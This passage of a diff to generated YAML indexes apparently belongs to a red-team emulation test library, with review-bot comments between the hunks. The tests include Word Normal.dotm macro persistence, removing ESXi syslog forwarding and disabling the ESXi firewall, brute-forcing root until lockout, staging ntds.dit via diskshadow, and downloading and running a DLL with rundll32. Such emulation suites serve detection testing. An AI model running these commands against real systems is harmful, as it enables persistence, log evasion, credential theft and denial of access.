@@ -60802,7 +60873,104 @@ persistence: x_mitre_permissions_required: - User - Administrator - atomic_tests: [] + identifier: T1137.001 + atomic_tests: + - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via + PowerShell + auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8 + description: 'Injects a Macro in the Word default template "Normal.dotm" and + makes it execute each time that Word is opened. In this test, the Macro creates + a sheduled task to open Calc.exe every evening. + + ' + supported_platforms: + - windows + dependencies: + - description: 'Microsoft Word must be installed + + ' + prereq_command: | + try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually + to meet this requirement" + + ' + executor: + name: powershell + elevation_required: true + command: "# Registry setting to \"Trust access to the VBA project object model\" + in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue + = \"AccessVBOM\"\n$registryData = \"1\"\n# The path where a flag text file + will be created if Registry setting did not already exist or if it was set + to 0\n$flagPath1 = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2 + = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n# + Get the value of the Key/Value pair\n$value = (Get-ItemProperty -Path $registryKey + -Name $registryValue -ErrorAction SilentlyContinue).$registryValue\n# Logical + operation to: if the value of the key/value is 1, do nothing - \n# if the + value is 0, change it to 1 and create flag1 - \n# if it doesn't exist, create + the value and flag2\nif ($value -eq \"1\") \n{\n Write-Host \"The registry + value '$registryValue' already exists with the required setting.\"\n} \n + \ elseif ($value -eq \"0\") 
\n{\n Write-Host \"The registry value was set + to 0, temporarily changing to 1.\"\n New-ItemProperty -Path $registryKey + -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null\n + \ echo \"flag1\" > $flagPath1\n} \n else \n{\n Write-Host \"The registry + value '$registryValue' does not exist, temporarily creating it.\"\n New-ItemProperty + -Path $registryKey -Name $registryValue -Value $registryData -PropertyType + DWORD -Force | Out-Null\n echo \"flag2\" > $flagPath2\n}\nAdd-Type -AssemblyName + Microsoft.Office.Interop.Word\n# Define the path of copied normal template + for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n# + Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n# + Create copy of orginal template for restoral\nCopy-Item -Path $docPath -Destination + $copyPath -Force\n# VBA code to be insterted as a Macro\n# Will create a + scheduled task to open the Calculator at 8:04pm daily\n$vbaCode = @\"\n + \ Sub AutoExec()\n Dim applicationPath As String\n Dim taskName As String\n + \ Dim runTime As String\n Dim schTasksCmd As String\n applicationPath + = \"C:\\Windows\\System32\\calc.exe\"\n taskName = \"OpenCalcTask\"\n runTime + = \"20:04\"\n schTasksCmd = \"schtasks /create /tn \"\"\" & taskName & + \"\"\" /tr \"\"\" & applicationPath & \"\"\" /sc daily /st \" & runTime + & \" /f\"\n Shell \"cmd.exe /c \" & schTasksCmd, vbNormalFocus\n End Sub\n\"@\n# + Create a new instance of Word.Application\n$word = New-Object -ComObject + Word.Application\n# Keep the Word application hidden\n$word.Visible = $false\n# + Open the document\n$document = $word.Documents.Open($docPath)\n# Access + the VBA project of the document\n$vbaProject = $document.VBProject\n# Add + a new module to the VBA project\n$newModule = $vbaProject.VBComponents.Add(1) + # 1 = vbext_ct_StdModule\n# Add the VBA code to the new 
module\n$newModule.CodeModule.AddFromString($vbaCode)\n# + Run the Macro\n$word.run(\"AutoExec\")\n# Save and close the document\n$document.SaveAs($docPath)\n$document.Close()\n# + Quit Word\n$word.Quit()\n# Release COM objects\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document) + | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word) + | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject) + | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule) + | Out-Null\n" + cleanup_command: "# Registry setting to \"Trust access to the VBA project + object model\" in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue + = \"AccessVBOM\"\n$registryData1 = \"1\"\n$registryData0 = \"0\"\n# Defines + the path each flag file created depending on the original registry state\n$flagPath1 + = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2 + = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n# + Define the path of copied normal template for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n# + Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n# + Delete the scheduled task created by the Macro\nschtasks /Delete /TN \"OpenCalcTask\" + /F | Out-Null\n#Restore the orginal template if the backup copy exists\nif + (Test-Path $copyPath)\n{\n #Delete the injected template\n Remove-Item + -Force $docPath -ErrorAction SilentlyContinue\n # Restore the original + template\n Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction + SilentlyContinue\n Write-Host \"The original template has been restored\"\n}\n + \ else\n{\n Write-Host \"The original template is present\"\n}\n#Restore + the original state of the registry key\nif (Test-Path 
$flagPath1) \n{\n + \ # The value was originally 0, set back to 0\n New-ItemProperty -Path + $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD + -Force | Out-Null\n Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue\n + \ Write-Host \"The original registry state has been restored\"\n} \n elseif + (Test-Path $flagPath2)\n{\n #The value did not previously exist, delete + the value\n Remove-ItemProperty -Path $registryKey -Name $registryValue + | Out-Null\n Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue + | Out-Null\n Write-Host \"The original registry state has been restored\"\n}\n + \ else \n{\n # The value was already 1, do nothing\n Write-Host \"The + value $registryValue already existed in $registryKey.\"\n}\n" T1546.009: technique: x_mitre_platforms: 
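Review bot: In the `command` of the T1137.001 test, `Copy-Item -Path $docPath -Destination $copyPath -Force` replaces the `Normal1.dotm` backup on every run, so a second execution without cleanup backs up the already-modified template and `cleanup_command` then restores the macro instead of removing it. Guard the backup: `if (-not (Test-Path $copyPath)) { Copy-Item -Path $docPath -Destination $copyPath }`. The prerequisite check also runs `Stop-Process -Name "winword"`, which ends every Word process of that name rather than only the instance it just created; calling `.Quit()` on that COM object is narrower. The registry path hard-codes Office `16.0`, which the description should state as a requirement. index.yaml looks generated, so these edits belong in the T1137.001 source YAML.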
@@ -74546,6 +74714,65 @@ collection: cleanup_command: 'rm -rf #{input_folder}' name: bash elevation_required: false + - name: ESXi - Remove Syslog remote IP + auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2 + description: 'An adversary may edit the syslog config to remove the loghost + in order to prevent or redirect logs being received by SIEM. + + ' + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe + username: + description: Username used to log into ESXi + type: string + default: root + password: + description: password used to log into ESXI + type: string + default: n/a + dependency_executor_name: powershell + dependencies: + - description: 'The plink executable must be found in the ExternalPayloads folder. + + ' + prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: "# Extract line with IP address from the syslog configuration output\n#{plink_file} + -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_get_loghost.txt + | findstr /r \"[0-9]*\\.[0-9]*\\.[0-9]*\\.\" > c:\\temp\\loghost.txt\n\n# + Replace the IP with \"0\"\n#{plink_file} -ssh #{vm_host} -l #{username} + -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_remove_loghost.txt\n\n# + Extract the IP from the line extracted from findstr\n$inputFilePath = \"c:\\temp\\loghost.txt\"\n$outputFilePath + = \"c:\\temp\\loghost_ip.txt\"\n\n$fileContent = Get-Content -Path $inputFilePath + -Raw\n\nif 
([string]::IsNullOrWhiteSpace($fileContent)) {\n Write-Host + \"The content is $fileContent\"\n Write-Host \"The file is empty\"\n} + else {\n # Use a regular expression to extract IP addresses\n $ipAddresses + = [regex]::Matches($fileContent, '(udp|tcp):\\/\\/[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.*').Value\n + \ \n $output = \"esxcli system syslog config set --loghost=\" + $ipAddresses\n\n + \ $output | Out-File -FilePath $outputFilePath -Encoding ascii\n \n + \ Write-Host \"IP addresses extracted and saved to $outputFilePath\"\n}\n" + cleanup_command: | + # Re-add the initially extracted IP + #{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m c:\temp\loghost_ip.txt + + rm c:\temp\loghost_ip.txt + rm c:\temp\loghost.txt + name: powershell + elevation_required: true T1113: technique: modified: '2023-03-30T21:01:39.967Z' 
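Review bot: In `ESXi - Remove Syslog remote IP`, the second plink call (`esxi_remove_loghost.txt`) runs before the script checks whether the first call captured anything, so when `findstr` matches nothing or `c:\temp` does not exist the loghost is cleared while `loghost_ip.txt` is never written, and `cleanup_command` cannot restore remote logging. Move the removal into the `else` branch after `Out-File`, and create the directory first with `New-Item -Type Directory c:\temp -ErrorAction Ignore | Out-Null`. The dots in `[0-9]{1,3}.[0-9]{1,3}` are unescaped and match any character. The entry sits under T1560.001 (the `src` paths and the `collection` section), which looks like the wrong technique for a logging change and is worth confirming. Only the index, which looks generated, is shown here, so the edit belongs in the source YAML.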
@@ -81852,6 +82079,46 @@ credential-access: cleanup_command: 'rmuser -y art ' + - name: ESXi - Brute Force Until Account Lockout + auto_generated_guid: ed6c2c87-bba6-4a28-ac6e-c8af3d6c2ab5 + description: | + An adversary may attempt to brute force the password of privilleged account for privilege escalation. + In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a) + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe + lockout_threshold: + description: Specify the account lockout threshold configured on the ESXI + management server + type: string + default: '5' + dependency_executor_name: powershell + dependencies: + - description: 'The plink executable must be found in the ExternalPayloads folder. + + ' + prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: | + $lockout_threshold = [int]"#{lockout_threshold}" + for ($var = 1; $var -le $lockout_threshold; $var++) { + #{plink_file} -ssh "#{vm_host}" -l root -pw f0b443ae-9565-11ee-b9d1-0242ac120002 + } + name: powershell + elevation_required: false T1003: technique: x_mitre_platforms: 
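Review bot: `ESXi - Brute Force Until Account Lockout` hard-codes `-l root` and has no `cleanup_command`, so a run against a real host leaves the root account locked until the lockout timer expires or an administrator clears it, and the description does not say so. Add a `username` input argument, use `-l "#{username}"`, and state the lockout side effect in the description. Without `-batch`, plink falls back to an interactive password prompt once the `-pw` value is rejected, so the loop can stall in an unattended run; `-batch` avoids that, provided the host key is already cached or supplied with `-hostkey`. This is the index copy, which looks generated, so the change belongs in the technique's source YAML.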
@@ -90793,6 +91060,24 @@ credential-access: mklink /D #{symlink_path} \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1 name: command_prompt elevation_required: true + - name: Create Volume Shadow Copy with diskshadow + auto_generated_guid: b385996c-0e7d-4e27-95a4-aca046b119a7 + description: | + This test is intended to be run on a domain controller + An alternative to using vssadmin to create a Volume Shadow Copy for extracting ntds.dit + supported_platforms: + - windows + input_arguments: + filename: + description: Location of the script + type: Path + default: PathToAtomicsFolder\T1003.003\src\diskshadow.txt + executor: + command: | + mkdir c:\exfil + diskshadow.exe /s #{filename} + name: command_prompt + elevation_required: true T1558.003: technique: modified: '2023-03-30T21:01:46.538Z' diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml index 31a40608d2..4c4cfa6662 100644 --- a/atomics/Indexes/linux-index.yaml +++ b/atomics/Indexes/linux-index.yaml @@ -35883,7 +35883,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -35935,6 +35935,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/macos-index.yaml b/atomics/Indexes/macos-index.yaml index 7f7e6726f9..7397327c24 100644 --- a/atomics/Indexes/macos-index.yaml +++ b/atomics/Indexes/macos-index.yaml 
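Review bot: The `Create Volume Shadow Copy with diskshadow` entry (the first hunk on this line, in index.yaml) has no `cleanup_command`, so `c:\exfil` and anything the diskshadow script writes there stay on the domain controller after the test. `diskshadow.txt` is not part of this hunk, so whether it copies ntds.dit into that directory and whether it removes the shadow copy is an assumption to confirm; if it does, add `cleanup_command: rmdir /s /q c:\exfil` together with deletion of the shadow copy. `mkdir c:\exfil` also reports an error on a second run because the directory already exists; `if not exist c:\exfil mkdir c:\exfil` keeps the test repeatable. The index looks generated, so the edit belongs in the T1003.003 source YAML.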
@@ -32832,7 +32832,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -32884,6 +32884,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/office-365-index.yaml b/atomics/Indexes/office-365-index.yaml index 5b5c75a1bd..3df9b20a46 100644 --- a/atomics/Indexes/office-365-index.yaml +++ b/atomics/Indexes/office-365-index.yaml @@ -29543,7 +29543,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29595,6 +29595,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/saas-index.yaml b/atomics/Indexes/saas-index.yaml index 8691b2b794..0c2af3ad72 100644 --- a/atomics/Indexes/saas-index.yaml +++ b/atomics/Indexes/saas-index.yaml 
@@ -29362,7 +29362,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates @@ -29414,6 +29414,7 @@ persistence: x_mitre_permissions_required: - User - Administrator + identifier: T1137.001 atomic_tests: [] T1546.009: technique: diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index f2b3f060a2..00c4225656 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml 
@@ -684,6 +684,35 @@ defense-evasion: copy #{exe_to_launch} not_an_scr.scr rundll32.exe desk.cpl,InstallScreenSaver not_an_scr.scr cleanup_command: del not_an_scr.scr + - name: Running DLL with .init extension and function + auto_generated_guid: 2d5029f0-ae20-446f-8811-e7511b58e8b6 + description: | + This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up. + DLL created with the AtomicTestHarnesses Portable Executable Builder script. + supported_platforms: + - windows + input_arguments: + dll_file: + description: The DLL file to be called + type: string + default: PathToAtomicsFolder\T1218.011\bin\_WT.init + dll_url: + description: The URL to the DLL file that must be downloaded + type: url + default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.011/bin/_WT.init + dependency_executor_name: powershell + dependencies: + - description: The DLL file to be called must exist at the specified location + (#{dll_file}) + prereq_command: if (Test-Path "#{dll_file}") {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path "#{dll_file}") -ErrorAction ignore | Out-Null + Invoke-WebRequest "#{dll_url}" -OutFile "#{dll_file}" + executor: + command: 'rundll32.exe #{dll_file},krnl + + ' + name: command_prompt T1027.009: technique: modified: '2023-09-29T21:14:57.263Z' 
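Review bot: `dll_url` in the new "Running DLL with .init extension and function" test defaults to a `raw/master` URL, which is a mutable ref, and `prereq_command` only checks that `#{dll_file}` exists before `rundll32.exe #{dll_file},krnl` loads it. Pinning the default to a commit-specific URL and having the prereq compare a hash, e.g. `if ((Get-FileHash "#{dll_file}" -Algorithm SHA256).Hash -eq "EXPECTED_SHA256_PLACEHOLDER") {exit 0} else {exit 1}`, would stop the test from loading a binary that changed upstream or was already sitting at that path. The plink.exe downloads from a `latest/w64` URL in the three ESXi tests added later in this file have the same gap. If this index is generated, the change belongs in the atomic's own YAML.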
@@ -8589,6 +8618,48 @@ defense-evasion: ' name: command_prompt elevation_required: true + - name: ESXi - Disable Firewall via Esxcli + auto_generated_guid: bac8a340-be64-4491-a0cc-0985cb227f5a + description: 'Adversaries may disable the ESXI firewall via ESXCLI + + ' + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe + username: + description: username used to log into ESXi + type: string + default: root + password: + description: password used to log into ESXI + type: string + default: n/a + dependency_executor_name: powershell + dependencies: + - description: 'The plink executable must be found in the ExternalPayloads folder. + + ' + prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} -m + PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_disable_firewall.txt\n" + cleanup_command: "#{plink_file} -ssh #{vm_host} -l #{username} -pw #{password} + -m PathToAtomicsFolder\\..\\atomics\\T1562.004\\src\\esxi_enable_firewall.txt\n" + name: command_prompt + elevation_required: false T1553.003: technique: x_mitre_platforms: 
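Review bot: Both `command` and `cleanup_command` of "ESXi - Disable Firewall via Esxcli" pass the ESXi credential as `-pw #{password}`, so whatever the operator supplies is recorded in process-creation and command-line logging on the test host and in any execution log the runner keeps. The `password` input description should say this and call for a throwaway lab account, for example `description: password for a disposable lab account; it is passed on the command line and will appear in process logs`. Where the installed plink supports it, reading the secret from a file with `-pwfile` avoids putting it in argv. The "ESXi - Remove Syslog remote IP" test added later in this file uses the same `-pw #{password}` pattern. The default of `n/a` also means the test cannot succeed unless the input is overridden, which is worth stating in the description.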
@@ -50264,7 +50335,7 @@ persistence: description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. Retrieved February 5, 2019. modified: '2021-08-16T21:27:10.873Z' - name: Office Template Macros + name: 'Office Application Startup: Office Template Macros.' description: "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates 
@@ -50316,7 +50387,104 @@ persistence: x_mitre_permissions_required: - User - Administrator - atomic_tests: [] + identifier: T1137.001 + atomic_tests: + - name: Injecting a Macro into the Word Normal.dotm Template for Persistence via + PowerShell + auto_generated_guid: 940db09e-80b6-4dd0-8d4d-7764f89b47a8 + description: 'Injects a Macro in the Word default template "Normal.dotm" and + makes it execute each time that Word is opened. In this test, the Macro creates + a sheduled task to open Calc.exe every evening. + + ' + supported_platforms: + - windows + dependencies: + - description: 'Microsoft Word must be installed + + ' + prereq_command: | + try { + New-Object -COMObject "Word.Application" | Out-Null + Stop-Process -Name "winword" + exit 0 + } catch { exit 1 } + get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually + to meet this requirement" + + ' + executor: + name: powershell + elevation_required: true + command: "# Registry setting to \"Trust access to the VBA project object model\" + in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue + = \"AccessVBOM\"\n$registryData = \"1\"\n# The path where a flag text file + will be created if Registry setting did not already exist or if it was set + to 0\n$flagPath1 = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2 + = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n# + Get the value of the Key/Value pair\n$value = (Get-ItemProperty -Path $registryKey + -Name $registryValue -ErrorAction SilentlyContinue).$registryValue\n# Logical + operation to: if the value of the key/value is 1, do nothing - \n# if the + value is 0, change it to 1 and create flag1 - \n# if it doesn't exist, create + the value and flag2\nif ($value -eq \"1\") \n{\n Write-Host \"The registry + value '$registryValue' already exists with the required setting.\"\n} \n + \ elseif ($value -eq \"0\") 
\n{\n Write-Host \"The registry value was set + to 0, temporarily changing to 1.\"\n New-ItemProperty -Path $registryKey + -Name $registryValue -Value $registryData -PropertyType DWORD -Force | Out-Null\n + \ echo \"flag1\" > $flagPath1\n} \n else \n{\n Write-Host \"The registry + value '$registryValue' does not exist, temporarily creating it.\"\n New-ItemProperty + -Path $registryKey -Name $registryValue -Value $registryData -PropertyType + DWORD -Force | Out-Null\n echo \"flag2\" > $flagPath2\n}\nAdd-Type -AssemblyName + Microsoft.Office.Interop.Word\n# Define the path of copied normal template + for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n# + Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n# + Create copy of orginal template for restoral\nCopy-Item -Path $docPath -Destination + $copyPath -Force\n# VBA code to be insterted as a Macro\n# Will create a + scheduled task to open the Calculator at 8:04pm daily\n$vbaCode = @\"\n + \ Sub AutoExec()\n Dim applicationPath As String\n Dim taskName As String\n + \ Dim runTime As String\n Dim schTasksCmd As String\n applicationPath + = \"C:\\Windows\\System32\\calc.exe\"\n taskName = \"OpenCalcTask\"\n runTime + = \"20:04\"\n schTasksCmd = \"schtasks /create /tn \"\"\" & taskName & + \"\"\" /tr \"\"\" & applicationPath & \"\"\" /sc daily /st \" & runTime + & \" /f\"\n Shell \"cmd.exe /c \" & schTasksCmd, vbNormalFocus\n End Sub\n\"@\n# + Create a new instance of Word.Application\n$word = New-Object -ComObject + Word.Application\n# Keep the Word application hidden\n$word.Visible = $false\n# + Open the document\n$document = $word.Documents.Open($docPath)\n# Access + the VBA project of the document\n$vbaProject = $document.VBProject\n# Add + a new module to the VBA project\n$newModule = $vbaProject.VBComponents.Add(1) + # 1 = vbext_ct_StdModule\n# Add the VBA code to the new 
module\n$newModule.CodeModule.AddFromString($vbaCode)\n# + Run the Macro\n$word.run(\"AutoExec\")\n# Save and close the document\n$document.SaveAs($docPath)\n$document.Close()\n# + Quit Word\n$word.Quit()\n# Release COM objects\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($document) + | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($word) + | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($vbaProject) + | Out-Null\n[System.Runtime.InteropServices.Marshal]::ReleaseComObject($newModule) + | Out-Null\n" + cleanup_command: "# Registry setting to \"Trust access to the VBA project + object model\" in Word\n$registryKey = \"HKCU:Software\\Microsoft\\Office\\16.0\\Word\\Security\"\n$registryValue + = \"AccessVBOM\"\n$registryData1 = \"1\"\n$registryData0 = \"0\"\n# Defines + the path each flag file created depending on the original registry state\n$flagPath1 + = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag1.txt\"\n$flagPath2 + = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\T1137-001_Flag2.txt\"\n# + Define the path of copied normal template for restoral\n$copyPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal1.dotm\"\n# + Define the path to the normal template\n$docPath = \"$env:USERPROFILE\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\"\n# + Delete the scheduled task created by the Macro\nschtasks /Delete /TN \"OpenCalcTask\" + /F | Out-Null\n#Restore the orginal template if the backup copy exists\nif + (Test-Path $copyPath)\n{\n #Delete the injected template\n Remove-Item + -Force $docPath -ErrorAction SilentlyContinue\n # Restore the original + template\n Rename-Item -Force -Path $copyPath -NewName $docPath -ErrorAction + SilentlyContinue\n Write-Host \"The original template has been restored\"\n}\n + \ else\n{\n Write-Host \"The original template is present\"\n}\n#Restore + the original state of the registry key\nif (Test-Path 
$flagPath1) \n{\n + \ # The value was originally 0, set back to 0\n New-ItemProperty -Path + $registryKey -Name $registryValue -Value $registryData0 -PropertyType DWORD + -Force | Out-Null\n Remove-Item -Force $flagPath1 -ErrorAction SilentlyContinue\n + \ Write-Host \"The original registry state has been restored\"\n} \n elseif + (Test-Path $flagPath2)\n{\n #The value did not previously exist, delete + the value\n Remove-ItemProperty -Path $registryKey -Name $registryValue + | Out-Null\n Remove-Item -Force $flagPath2 -ErrorAction SilentlyContinue + | Out-Null\n Write-Host \"The original registry state has been restored\"\n}\n + \ else \n{\n # The value was already 1, do nothing\n Write-Host \"The + value $registryValue already existed in $registryKey.\"\n}\n" T1546.009: technique: x_mitre_platforms: 
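Review bot: The `prereq_command` of the Normal.dotm test runs `Stop-Process -Name "winword"` after creating the COM object, which stops every process of that name the caller is allowed to stop, not only the instance the check just started, so a dependency check can discard unsaved documents in an open Word session. Holding on to the object and closing only that instance, `$w = New-Object -ComObject "Word.Application"; $w.Quit(); exit 0`, avoids this. Separately, the registry path is hard-coded to Office `16.0`, and `AccessVBOM` stays at 1 with the modified template and the `OpenCalcTask` scheduled task in place until the cleanup runs. The description should say both, so the test host is not left in that state unnoticed.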
@@ -61327,6 +61495,65 @@ collection: >nul 2>&1 ' + - name: ESXi - Remove Syslog remote IP + auto_generated_guid: 36c62584-d360-41d6-886f-d194654be7c2 + description: 'An adversary may edit the syslog config to remove the loghost + in order to prevent or redirect logs being received by SIEM. + + ' + supported_platforms: + - windows + input_arguments: + vm_host: + description: Specify the host name of the ESXi Server + type: string + default: atomic.local + plink_file: + description: Path to Putty + type: path + default: PathToAtomicsFolder\..\ExternalPayloads\plink.exe + username: + description: Username used to log into ESXi + type: string + default: root + password: + description: password used to log into ESXI + type: string + default: n/a + dependency_executor_name: powershell + dependencies: + - description: 'The plink executable must be found in the ExternalPayloads folder. + + ' + prereq_command: 'if (Test-Path "#{plink_file}") {exit 0} else {exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null + Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -OutFile "#{plink_file}" + executor: + command: "# Extract line with IP address from the syslog configuration output\n#{plink_file} + -ssh #{vm_host} -l #{username} -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_get_loghost.txt + | findstr /r \"[0-9]*\\.[0-9]*\\.[0-9]*\\.\" > c:\\temp\\loghost.txt\n\n# + Replace the IP with \"0\"\n#{plink_file} -ssh #{vm_host} -l #{username} + -pw #{password} -m PathToAtomicsFolder\\..\\atomics\\T1560.001\\src\\esxi_remove_loghost.txt\n\n# + Extract the IP from the line extracted from findstr\n$inputFilePath = \"c:\\temp\\loghost.txt\"\n$outputFilePath + = \"c:\\temp\\loghost_ip.txt\"\n\n$fileContent = Get-Content -Path $inputFilePath + -Raw\n\nif ([string]::IsNullOrWhiteSpace($fileContent)) {\n Write-Host + \"The content is 
